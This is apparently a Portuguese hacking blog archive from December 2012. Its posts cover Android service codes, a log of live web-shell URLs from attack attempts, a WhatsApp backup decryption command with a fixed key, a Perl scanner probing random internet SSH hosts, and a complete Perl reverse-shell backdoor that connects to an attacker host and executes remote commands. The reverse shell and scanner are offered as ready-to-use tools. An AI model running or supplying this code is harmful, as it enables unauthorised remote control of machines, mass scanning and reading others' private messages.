segunda-feira, dezembro 31, 2012

,

Google WIFI

Neste verão o Google oferece acesso gratuito WiFi para você ficar perto de
todos os seus amigos. Sejam aqueles à distância ou até os no smartphone ao lado. http://brasilfreewifi.withgoogle.com/

O Google irá oferecer acesso Wi-Fi gratuito em 150 bares de sete cidades brasileiras a partir deste sábado, 15/12. O projeto, batizado de Free WiFi, permitirá o acesso à internet a partir de smartphones, tablets ou computadores. Ao ativar o Wi-Fi no dispositivo, o aparelho irá identificar a rede do Google e, no primeiro acesso, o navegador web irá exibir alguns produtos da empresa com sugestão para baixa-los. A partir daí o uso dentro do estabelecimento passa a ser ilimitado.

Segundo o Google, a conexão utilizada será entre 10 Mbps ou 30 Mbps, dependendo do tipo de rede utilizada pelo bar (Wi-Fi ou fibra óptica, respectivamente), e será compartilhada entre todos os clientes do estabelecimento. Não haverá, ainda de acordo com a companhia, nenhum tipo de limitação ou restrição para a navegação.

Os 150 bares participantes estão listados no site oficial do projeto e podem ser encontrados nas cidades de São Paulo, Rio de Janeiro, Belo Horizonte, Curitiba, Porto Alegre, Florianópolis e Campinas. A iniciativa, exclusiva para o Brasil, foi criada pelo Google em parceria com a Enox On-Life Media e terá duração de 90 dias.

fonte

Secret's Code Android



*#*#4636#*#*
Codigo que mostra algumas informações sobre seu telefone e a bateria do mesmo, ao digita-lo aparecem 4 menus na tela:

    * Informações do telefone
    * Informações da bateria
    * Histórico da Bateria
    * Estatísticas de uso do telefone

*#*#7780#*#*
CUIDADO - Digitando este codigo ele vai “resetar” seu telefone com as informações originais de fábrica, vai remover as seguintes “coisas” do seu telefone:

    Apagar sua conta do Google
    Apagar os aplicativos de sistema e arquivo de dados
    Apagar os aplicativos que você fez download.

Não vai remover:
    * Sistema “operacional” do telefone
    * Arquivos do seu cartão SD.

*2767*3855#
CUIDADO – Este código faz o mesmo que o citado acima, porem, também apaga seu cartão de memoria e todos os arquivos nele e ainda mais, faz a reinstalação do software original do telefone.

*#*#34971539#*#*
Codigo usado para receber informações sobre a câmera do telefone – Vai mostrar 4 menus:
Atualizar o software da câmera (NÃO TENTE ISTO)
Atualizar o software da câmera usando um arquivo que esteja no SD
Mostra a versão do software da câmera
Mostra se é possível fazer a atualização do software.
CUIDADO: Nunca use a opção numero 1 (Atualizar software da câmera) senão você tera que enviar seu telefone para a assistência técnica para reinstalar o software da câmera.

*#*#7594#*#*
Com este codigo você pode mudar a maneira que o botão de desligar funciona. Mudando esta opção você pode optar por “desligar o telefone” ao apertar e segurar o botão (ao invés de aparecer a tela “Modo Avião,etc”)

*#*#273283*255*663282*#*#*

Este código abre uma opção de backup ou copia dos arquvios do seu sistema e você poderá fazer um backup das suas imagens, videos, sons e muito mais.

*#*#197328640#*#*
Muda seu telefone para modo de serviço onde é possível fazer testes no seu aparelho. Abre a opção de testar o Bluetooh, Wlan e o GPS.


*#*#232338#*#*
Mostra o MAC address do Wifi

*#*#1472365#*#*
GPS test

*#*#1575#*#*
Outro teste de GPS

*#*#232331#*#*
Teste de Bluetooth

*#*#232337#*#
Mostra o endereço do Bluetooth

*#*#8255#*#*

Este código mostra o Monitor de serviço do GoogleTALK.

Codigos para obter versão de “firmware”:
*#*#4986*2650468#*#* – PDA, Phone, H/W, RFCallDate
*#*#1234#*#* – PDA e Telefone
*#*#1111#*#* – FTA SW Version
*#*#2222#*#* – FTA HW Version
*#*#44336#*#* – PDA, Phone, CSC, Build Time, Changelist number

 Codigos para fazer testes de fábrica:
*#*#0283#*#* – Packet Loopback
*#*#0*#*#* – LCD test
*#*#0673#*#* OR *#*#0289#*#* – Melody test
*#*#0842#*#* – Device test (Vibration test and BackLight test)
*#*#2663#*#* – Versão da tela sensível ao toque
*#*#2664#*#* – Teste da tela sensível ao toque
*#*#0588#*#* – Teste do sensor de proximidade
*#*#3264#*#* – RAM version

Read more: http://eusouandroid.com/todos-os-codigos-para-seu-android/#ixzz2Gg9osBMK
, ,

Web Shells and RFIs Collection

Web Shells and RFIs Collection

      I wrote a little script to periodically look through my web logs for unique RFIs and Web Shells, and then collect them on one page where I can go look at them or download them to add to my Web Shell library. Many of these attacks are repeated multiple time, so I ignore the time fields in judging if an RFI/Web Shell is unique. I've coded it to weed out links to Web Shells that 404. I also use nofollow and a referrer hiding service so it does not look like I'm attacking anyone with the web shells (but the check for 404 sort of looks suspicious). This page will also let you link off to firebwall.com where you can use their PHP decoder to look at the obfuscated code. Enjoy my Web Shell zoo, it should update itself every hour or so. If you see your domain on the list of websites hosting Web Shells you are likely pwned and should clean up your server.
Filtered for more likely Webshell RFIs
AttackerWhois IPRequestView on PHP DecoderAgentRefererTime
187.40.82.13Whoishttp://www.amerint.com.br/plugins/system/chupa.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-24/Dec/2012:19:47:31 -0800
187.40.81.59Whoishttp://www.goodigood.com/mcharge/php/class//ekta.txt?View on PHP Decoder--20/Dec/2012:13:48:06 -0800
186.249.211.224Whoishttp://www.goodigood.com/mcharge/php/class//dek.txt?View on PHP Decoder--20/Dec/2012:01:16:04 -0800
189.90.43.3Whoishttp://www.qualityom.com.br/plugins/system/ip.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-18/Dec/2012:12:17:48 -0800
187.58.105.54Whoishttp://c99.gen.tr/c99.txt?View on PHP DecoderMozilla/5.0 (Windows NT 5.1; rv:8.0.1) Gecko/20100101 Firefox/8.0.1-17/Dec/2012:13:26:10 -0800
187.40.106.182Whoishttp://www.luvex.com.br/teste/riko.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-16/Dec/2012:20:34:42 -0800
200.98.143.17Whoishttp://www.goodigood.com/mainfiles/teste.txt?View on PHP Decoder--14/Dec/2012:16:12:49 -0800
189.72.209.60Whoishttp://casamarvera10.cwahi.net/tester.txt??View on PHP DecoderMozilla/3.0 (compatible; Indy Library)-13/Dec/2012:13:57:09 -0800
200.98.143.17Whoishttp://www.goodigood.com/mainfiles/inside.txt?View on PHP Decoder--13/Dec/2012:04:38:05 -0800
81.177.22.64Whoishttp://adamhomes.co.uk/scripts/id1.txt?View on PHP DecoderMozilla/5.0-13/Dec/2012:01:15:11 -0800
118.97.95.231Whoishttp://ijencrew.wapsite.me/bnc.ichat.txt??View on PHP DecoderMozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0-11/Dec/2012:09:04:35 -0800
190.188.186.123Whoishttp://mobile.asnieres-sur-seine.fr/data/hjkjyuf43.txt?View on PHP DecoderMozilla/3.0 (compatible; Indy Library)-09/Dec/2012:17:21:14 -0800
187.40.111.9Whoishttp://www.khonkaenrongyen.com/plugins/cmd2.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-06/Dec/2012:20:58:26 -0800
187.40.103.247Whoishttp://www.jcestetica.com.br/plugins/system/r57.txt??View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-06/Dec/2012:06:38:05 -0800
111.68.215.186Whoishttp://www.sungeundongsan.org/zb/id.txt?View on PHP Decoderlibwww-perl/5.805-05/Dec/2012:21:35:42 -0800
200.98.129.248Whoishttp://www.ideocondo.com/php/new/flood/Scripts/g.txt?View on PHP DecoderMozilla/3.0 (compatible; Indy Library)-03/Dec/2012:18:45:35 -0800
200.98.164.226Whoishttp://swiatodziezy.com/libraries/inside.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-02/Dec/2012:10:11:41 -0800
177.6.107.193Whoishttp://www.kini-kini.com/ancien_kini/optms.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-29/Nov/2012:03:43:41 -0800
5.39.9.95Whoishttp://www.dunkerquepromotion.org/images/temoignages/danger.txt??View on PHP DecoderMozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1-27/Nov/2012:16:21:38 -0800
111.119.184.52Whoishttp://c99.gen.tr/c99.txtView on PHP DecoderMozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0-26/Nov/2012:22:24:24 -0800
200.98.140.97Whoishttp://www.ntempreco.com/teste.txt??View on PHP DecoderMozilla/3.0 (compatible; Indy Library)-26/Nov/2012:16:29:14 -0800
200.98.129.118Whoishttp://www.asiandogs.ru/dog/id1.txt??View on PHP DecoderMozilla/5.0-24/Nov/2012:16:48:24 -0800
189.73.212.194Whoishttp://galaxiauniversal.com/css/optms.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-24/Nov/2012:03:09:29 -0800
187.40.94.178Whoishttp://www.jcestetica.com.br/plugins/system/r57.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-20/Nov/2012:12:21:40 -0800
176.254.215.142Whoishttp://www.drivehq.com/web/v3nd3tta/shells/c99.txt?View on PHP DecoderMozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0-18/Nov/2012:15:45:22 -0800
177.25.109.82Whoishttp://egyptinsideout.com/plugins/system/nnframework/images/tester.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-17/Nov/2012:04:26:40 -0800
189.74.19.227Whoishttp://pc.eromil.com/goza.txt?View on PHP DecoderMozilla/3.0 (compatible; Indy Library)-16/Nov/2012:15:47:09 -0800
200.98.171.238Whoishttp://acesso9583.hut4.ru/tester.txt?View on PHP Decoder--14/Nov/2012:16:43:05 -0800
201.15.114.66Whoishttp://www.buy-nippon-motors.com/com/js/swfobject/optms.txtView on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-14/Nov/2012:14:58:25 -0800
187.90.77.194Whoishttp://www.xambre.pr.gov.br/plugins/system/tester.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-14/Nov/2012:08:46:22 -0800
189.48.124.171Whoishttp://egyptinsideout.com/plugins/system//tooltips/images/tester.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-14/Nov/2012:06:18:24 -0800
189.1.174.192Whoishttp://www.wushu.org.ge/e107_images/david.txtView on PHP DecoderMozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1-13/Nov/2012:17:23:57 -0800
201.24.16.247Whoishttp://produtosmaster.com/sonaberadinha.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-09/Nov/2012:04:25:14 -0800
189.73.213.247Whoishttp://produtosmaster.com/sonaberadinha.txtView on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-08/Nov/2012:10:35:59 -0800
5.39.9.95Whoishttp://swjzaleze.ovh.org/swietlica_15/danger.txt??View on PHP DecoderMozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1-04/Nov/2012:08:49:21 -0800
49.156.155.246Whoishttp://ead-aerospace.com/Intranet/Dossiers/Customers/2/c99.txtView on PHP DecoderMozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4-01/Nov/2012:07:32:59 -0700
72.55.132.168Whoishttp://jamina.vacau.com/e107_admin/raw.txt??View on PHP DecoderMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511-26/Oct/2012:20:12:31 -0700
64.20.38.154Whoishttp://c99.gen.tr/r57.txt?&security/changemacView on PHP DecoderSnoopy v1.2.4-24/Oct/2012:11:12:35 -0700
64.20.38.154Whoishttp://c99.gen.tr/r57.txt?&security/windows-forensics-registry-and-file-system-spotsView on PHP DecoderSnoopy v1.2.4-24/Oct/2012:11:09:59 -0700
64.20.38.154Whoishttp://c99.gen.tr/r57.txt?&security/networkprinterhackingView on PHP DecoderSnoopy v1.2.4-24/Oct/2012:10:35:49 -0700
177.0.49.124Whoishttp://www.jkchemicals.in/wp-content/themes/Chameleon/cache/shell.txtView on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-20/Oct/2012:18:22:20 -0700
186.247.205.162Whoishttp://www.acfinance.com.br/tool.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-18/Oct/2012:09:45:34 -0700
200.98.164.62Whoishttp://c99.gen.tr/c99.txt??View on PHP DecoderMozilla/3.0 (compatible; Indy Library)-17/Oct/2012:16:42:06 -0700
217.71.106.39Whoishttp://www.avidsen.com/2009/danger.txt????View on PHP DecoderMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13-17/Oct/2012:05:41:12 -0700
63.143.40.27Whoishttp://www.nysnagard.no/mail.txt?View on PHP DecoderMozilla/3.0 (compatible; Indy Library)-04/Oct/2012:08:25:27 -0700
187.40.106.157Whoishttp://www.akakaslogistics.com/manolo.txt?View on PHP DecoderMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-02/Oct/2012:22:20:27 -0700

Crawljax Web Applications

Crawljax
“Crawljax helps you crawl Ajax-based web applications. Crawljax is an open source Java tool for automatically crawling and testing modern (Ajax) web applications. It can crawl any Ajax-based web application by firing events and filling in form data. It creates a state-flow graph of the dynamic DOM states and the transitions between them. It is a plugin-driven architecture.”

Changes made to Crawljax 2.0:

  • Fixed issue 55: State can be represented by multiple StateVertix objects
  • Fixed issue 57: XPathHelper.formatXPath(String xpath) doesn’t handle axes.
  • Added Mobilecrawl. Make crawling web apps on Android and iPhone possible.
  • Use temp files for unit tests
  • Updated JUnit asserts to new version
  • Removed try catch blocks that add nothing to functionality
  • Removed duplicate code by extracting into methods
  • Removed duplicate code by using JUnit functionality
  • Moved test/site into test/resources/site because it’s a test resource.
  • Removed empty test ElementResolverTest.java
  • Fixed issue 61: tests don’t need external resources anymore. Tests can now delcare a classrule that starts an embedded Jetty server to server the pages locally so we are not dependend on external sites anymore.
  • Enhancement: Tests should not depend on external resources. Some of the test now depend on external websites like google.com. It’s makes the test suite dependent and might cause different test results while the code doesn’t change.
  • Fixed tests time out or hang on Mac OS-X using Firefox
  • Fixed XPathHelper.formatXPath(String xpath) doesn’t handle axes.
  • State can be represented by multiple StateVertix objects

Download Crawljax: Crawljax 2.1 - crawljax-src-2.1.zip/ Binary – crawljax-2.1.zip

,

Hackplayer's Videos.

  50 mais vistos Hackplayers

Como sempre, obrigado por ler e participar com os seus comentários, soluções para os desafios e colaborações. Não hesite em contactar-nos se você está interessado em um determinado tópico ou se você quer participar com o seu artigo. Vemo-nos em 2013. Feliz e próspero Ano Novo!
  1. hackplayers: Blogroll em espanhol
  2. Sexting e fraude em estudantes Deusto
  3. LOIC: ferramenta de DDoS utilizado por Anonymous
  4. Faces "tesão" em chat do Facebook
  5. WhatsApp: como enviar uma imagem com uma prévia falsa
  6. Reaver-WPS: ataques de força bruta contra WPS
  7. Backtrack 5 Tutoriais
  8. WhatsAppSniffer: conversas WhatsApp capturar facilmente
  9. hackplayers: Inglés Blogroll
  10. O dia 9 de Anônimo concorda Capio sites
  11. Bloquear Oficina colheita # 3: Ferramentas ganzuado
  12. Compilação de recursos Noel malwares análise Valca
  13. Bloquear escolher Oficina 2: Técnicas de abertura
  14. WiFite: rachaduras redes sem fio para manequins
  15. hackplayers: Desafios Hackplayers
  16. 50 tutoriais para Unix Systems Administrator / Linux
  17. Bloquear Oficina colheita # 1: Introdução
  18. Desafio 10: ver o padrão de desbloqueio
  19. Primeiro dia explora 0 para o Windows 8
  20. Nmap: port scanner para o scanner de vulnerabilidade
  21. Mergulho profundo na Internet
  22. A Vingança dos Anónimos (se Amanda Todd)
  23. Backdoor oculta no Windows
  24. Disponíveis BackTrack 5 R3!
  25. Backdoor PHP Weevely escondido em um metadados JPG
  26. Vulnerabilidade no Skype permite que o IP de qualquer usuário
  27. Backdoors web em imagens: melhorar a técnica
  28. Um passo além do antivírus. Sandboxie
  29. Transforme seu Firefox em um keylogger invisível
  30. Sobre a forma como a esgueirar-se para o metrô em um elegante ... (NFC hack)
  31. Quebrar redes Wi-Fi com o Android (em modo monitor)
  32. Como ignorar a autenticação do Microsoft SQL Server em um servidor já comprometidos (pós-operatório)
  33. O velho truque de teclas de aderência ainda trabalhava
  34. Evasão do limite de 140 caracteres do Twitter por CESU-8 Codificação
  35. Votação para os melhores da web técnicas de invasão de 2011
  36. Santoku: distribuição de segurança móvel
  37. Top 10 da Web técnicas de hackers em 2010
  38. Session Hijacking por DroidSheep
  39. Como abrir um cadeado combinações testadas em 100
  40. Digitalização com nmap através do Tor
  41. RAT DarkComet termina
  42. Qual é o melhor firewall de rede?
  43. Solução para desafiar 3 Bahrain GP
  44. Metasploit Autopwn
  45. CRIME: o novo ataque em SSL / TLS sucessor BEAST
  46. Anti: a partir de simples pentesting Android
  47. De 0x90 para 0x4c454554, uma viagem para a exploração
  48. Livro: O Hacker Bíblia 2009
  49. Injeção de SQL explora facilmente com Havij
  50. hackplayers: Twitters da trilha 

,

Decifrando o arquivo WhatsApp msgstore.db.crypt


As mensagens de dados WhatsApp são armazenados em um formato de arquivo SQLite. Para telefones IOS este arquivo está no caminho: [ID] App / Documents / ChatStorage.sqlite e, no caso de telefones Android em / com.whatsapp / databases / msgstore.db. Este arquivo é criptografado como Yago disse no ano passado e isso requer o telefone para acessar o jailbreakedo.

No caso de haver também arquivo de backup Android é armazenado no cartão de memória externa, nem foi criptografado. Isso mudou em uma atualização de aplicativo que sofreu após comentários de Iago. Dessa forma, se o telefone for perdido ou roubado, o cartão, mesmo se eles não podem ler as mensagens.

Infelizmente, o aplicativo usa criptografia (AES-192-BCE) no arquivo de backup sempre feito usando a mesma chave (346a23652a46392b4d73257c67317e352e3372482177652c), e nenhum fator único para cada dispositivo, de modo que você pode recuperar mensagens de qualquer Da mesma forma móvel e em poucos segundos.

Se por qualquer motivo você se vê nesta situação, para descriptografar o arquivo e acessar o banco de dados pode ser feito facilmente com OpenSSL ( fonte e binário para Windows ), com o seguinte comando, onde você especificar apenas o arquivo de entrada (-in) e saída (-out) com os nomes correspondentes:
    openssl enc -d  -aes-192-ecb -in msgstore-1.db.crypt -out msgstore.db.sqlite -K 346a23652a46392b4d73257c67317e352e3372482177652c
Para aqueles que querem ainda mais fácil, eu coloquei um site temporário até reiniciar automaticamente o arquivo criptografado: http://www.recovermessages.com/ .

Uma vez decifrado, você deve usar um gerenciador de SQLite para abrir o arquivo, como Administrador SQLite

Os criadores de Xtract (Fabio Sangiacomo e Martina Weidner) já havia encontrado esta, em dezembro de 2011 e teve a sua ferramenta e um excelente documento explicando como foram obtidos:
http://forum.xda-developers.com/showthread.php?p=24569917
https://code.google.com/p/hotoloti/downloads/list
https://www.os3.nl/_media/2011-2012/students/ssn_project_report.pdf

http://www.securitybydefault.com/2012/05/descifrando-el-fichero-msgstoredbcrypt.html
 

quinta-feira, dezembro 13, 2012

,

apagando rastros de Invasão II

" Yeap! i'm a haxor cat stupid admin! :D "
Update [31/12/2012] 
- antes de mais nada quero ressaltar que todas as informações aqui postadas, são de caráter Educativo,é como uma " espada" com ela nas mãos você pode matar e pode se defender , cabe a você a sua escola! .... Recentemente ouvi de um companheiro " poxa kembolle, não cai bem você realizados postagens " l33thaxor" em seu blog, isso não soa bem para os negócios, nem para seu grau de estudo."  

Achei importante a Observação todos aqui sabe como atacar, "defender é que é o difícil." Gosto muito do Alexos,[http://blog.alexos.com.br/ ] é profissional em que me inspiro muito em meus trabalhos,esse tipo de conteúdo você não encontra em certificações e só o famoso " underground" ensina.   Vejamos aqui exemplo simples de como utilizar Perl para otimizar diversas rotinas [Sysadmin] . Nosso atacante apos realizado a intrusão utiliza ferramentas como esta para apagar rastros após o crime; 



Observem que são so diretorios de 3 Sistemas Operacionais, 'linux', 'aix', 'sunos' nada que impeça de ser implementado para senhor Gates $$ também (: onde provavemente peritos iriam procurar rastros do seu ataque . Pois bem.. Existem Melhores praticas que auxiliam o administrador a se prevenir dos ataques realizados, e caso ela ocorra tenha uma contra medida, " fato" . Mas ninguém usa servidor de log's hoje em dia, quase toda empresa não tem rotina de beckup, não são afirmações só feita por sim, e sim por vários especialistas da área .  Nessas horas  um pote de mel, Ajuda no procedimento , ou não? .... 
,

SSH Scanner & Banner Grabber



Bom Dia Senhores!!
- Segue uma ótima aplicação para encontrar serviços SSH ativos .

#!/usr/bin/perl
$found = 0;
$num = 0;
use IO::Socket::INET;
use IO::Socket;
sub ipgen(){
my $range1 = 223;
my $range2 = 254;
$oct1 = int(rand($range1)) + 1;
$oct2 = int(rand($range2)) + 1;
$oct3 = int(rand($range2)) + 1;
$oct4 = int(rand($range2)) + 1;
if($oct1 == 127 || $oct1 == 172 || $oct1 == 192 || $oct1 == 10){
$ip = &ipgen();
}else{
$ip = "$oct1.$oct2.$oct3.$oct4";
}
return $ip;
}
$port=22;
$file="OutSSH.txt";
while(1==1){
$target = &ipgen();
my $sock = new IO::Socket::INET (
PeerAddr => $target,
PeerPort => $port,
Proto => 'tcp',
Timeout => '2',
);
system("cls");
$num = $num+1;
print q{
  ____ ____  _   _  
/ ___/ ___|| | | |  ___  ___ __ _ _ __
\___ \___ \| |_| | / __|/ __/ _` | '_ \
  ___) |__) |  _  | \__ \ (_| (_| | | | |
|____/____/|_| |_| |___/\___\__,_|_| |_|
  SSH Scanner & Banner Grabber
};
print "Found:$found Scanning Port:$port\n";
print "IPs Scanned:$num\n";
if($sock){
$sssh = IO::Socket::INET->new(PeerAddr=>$target,PeerPort=>$port,Timeout=>"2");
    if ($sssh) {
   while (<$sssh>) {
  $banner=$_;
  close($sssh);
  }
    }
if (!defined($banner)){
$banner="Dead Port";
}
$found = $found+1;
open(DAT, ">>$file") || die("Cannot Open Output File");
print DAT "$target : $banner\n";
close(DAT);
}
close($sock);
}
,

TCP Remote Shell

hy dudes! (:

#!/usr/bin/perl
#Coder FroZ3N
#Have Fun :)
use Sys::Hostname;
use IO::Socket::INET;
use Cwd;
my $machinename = hostname;
my $host = $ENV{LOGNAME} || $ENV{USER} || getpwuid(lt;);
my $path = getcwd;
my $hostname = $host.'@'.$machinename.":~$curdir# ";
$| =1;
$ip = $ARGV[0];
$port = $ARGV[1];
unless($ip and $port)
{ print q{
(+) Script Name : bdoor.pl
(+) Script CodeR : FroZeN
(+) Script Usage : ./bdoor.pl ip port
(+) Example : ./badoor.pl rooted.no-ip.org 1337
(+) Greetings : AnalyseR, Delirium, AmonR@, Drarqua , Rizla
};
}
$socket = new IO::Socket::INET(
PeerHost => $ip,
PeerPort => $port,
Proto => 'tcp',
) or die " (-) Socket Error : $!\n";
while(1)
{
showname();
while(<$socket>)
{
$cd = 'cd ';
$cma = $_;
if($cma =~ $cd)
{
@array = split ($cd , $cma);
chomp($array[1]);
$path = $array[1];
}
my @rec = qx{$_};
@command = join('',@rec);
foreach $line(@command)
{
print $socket "$line";
}
showname();
}
}
print $socket "\n";
$socket->close();
sub showname {
chdir($path);
my $curdir = getcwd;
my $hostname = $host.'@'.$machinename.":~$curdir# ";
print $socket $hostname;
}

segunda-feira, dezembro 10, 2012

terça-feira, dezembro 04, 2012

,

(Cheat Sheet) de segurança da Informação

Boa tarde Senhores e Senhoras  (:

Recentemente acompanhei algumas listas de comunicação alguns Sheet's que andarão rolando sobre segurança da informação e decidi compartilhar aqui neste humilde espaço com vocês, as mesmas servem para analistas de segurança, peritos em computação forense, desenvolvedores e demais atividades correlatas a Tecnologia. de Antemão agradeço ao mcsesolution pela reunião e contribuição das informações aqui disponibilizadas!

TítuloCréditosTipo
SQL Injection Cheat SheetMichael DawReference
Linux Security Quick Reference GuideLinuxSecurityPDF
SQL Injection Cheat SheetFerruh MavitunaReference
Security Architecture Cheat SheetOWASPReference
SQL Injection Prevention Cheat SheetOWASPReference
Transport Layer Protection Cheat SheetOWASPReference
XSS (Cross Site Scripting) Prevention Cheat SheetOWASPReference
SQL Injection Cheat SheetRSnakeReference
XSS (Cross Site Scripting) Cheat SheetRSnakeReference
Forensic Analysis Cheat SheetSANSPDF
Google Hacking and Defense Cheat SheetSANSPDF
IEEE 802.11SANSPDF
IPv6 TCP/IP and tcpdumpSANSPDF
Linux Intrusion Discovery Cheat SheetSANSPDF
Misc Tools Cheat SheetSANSPDF
Netcat Cheat SheetSANSPDF
TCP/IP and tcpdumpSANSPDF
Windows Command Line Cheat SheetSANSPDF
Windows Intrusion Discovery Cheat SheetSANSPDF
NMAP and NessusSecGuruPDF
Hping3José A. GuaschPDF
NMAP5Alejandro RamosPDF
Web ApplicationSecGuruPDF
Netcat Cheat SheetEd SkoudisPDF
Useful Attack ToolsEd SkoudisPDF
Windows commandline toolsEd SkoudisPDF
Analyzing Malicious Documents Cheat SheetLenny ZeltserReference
Critical Log Review Checklist for Security IncidentsDr. Anton Chuvakin and Lenny ZeltserPDF
Information Security Assessment RFP Cheat SheetLenny ZeltserPDF
Initial Security Incident Questionnaire for RespondersLenny ZeltserPDF
Network DDoS Incident Response Cheat SheetLenny ZeltserPDF
Reverse-Engineering Malware Cheat SheetLenny ZeltserPDF
Security Architecture Cheat Sheet for Internet ApplicationsLenny ZeltserPDF
Security Incident Survey Cheat Sheet for Server AdministratorsLenny ZeltserPDF
Troubleshooting Human CommunicationsLenny ZeltserPDF
ASP.NET Security ArchitectureAlik LevinReference



No mais é isso! Aquele abraço []'s

domingo, dezembro 02, 2012

,

NetSniff-ng


NetSniff-ng é um alto desempenho de rede do Linux sniffer para inspeção de pacotes. É semelhante aos analisadores tcpdump como, mas sem a necessidade de realizar as chamadas do sistema de busca de pacotes de rede. Uma área de memória mapeada dentro de espaço do kernel será usado para acessar pacotes, por isso não há necessidade de copiá-los para o userspace (um mecanismo de "zero-cópia"). Para este fim, NetSniff-ng é libpcap independente, mas, no entanto, suporta o formato de arquivo pcap para capturar, repetindo, e realizando análise offline de lixões pcap.

O projeto está focado na construção de um analisador robusto, limpo e seguro e utilitários que completa NetSniff-ng como um suporte para testes de penetração. NetSniff-ng pode ser usado para análise de protocolo, engenharia reversa, e depuração de rede.

Notas de versão V0.5.7: Esta versão corrige uma série de bugs, limpa o código e adiciona novos recursos, incluindo suporte 802,11 cru e uma língua nova configuração de pacotes para trafgen.

Download: http://packages.debian.org/search?suite=all&keywords=netsniff-ng
,

SMPPS (packet sniffer Simples Multi Protocol)




Os SMPPS (packet sniffer Simples Multi Protocol) é um projeto de código aberto baseado em C e soquetes simples, a finalidade do mesmo é obter software livre, funcional e robusto do que o princípio da captura de pacotes IP protocolos, TCP, UDP, ICMP e IGMP e controlar a forma de uma interface visual em modo de texto o tamanho da corrente de pacotes a ser transmitido na rede são classificados por protocolo, bem como o volume total e da quantidade de outros pacotes, tais como ARP.

O projeto desse princípio em face do desenvolvimento e por enquanto só pode capturar pacotes como TCP / IP, mas também pode criar um arquivo de log e modo de visualização depois de todo o fluxo capturado em uma detalhada e intuitiva para permitir fácil de analisar o tráfego de rede . Outro detalhe é que ele focado apenas e para uso em sistemas UNIX e para ajudar os administradores de rede e sistemas, programadores, desenvolvedores, hackers éticos pentesters e similares.

Download: smpps-0.9.0 (18,0 kB)
Download : smpps-0.9.0 (18.0 kB) 
Find Other Version |
Read more in here : http://cr4sh-dump.xp3.biz/smpps.html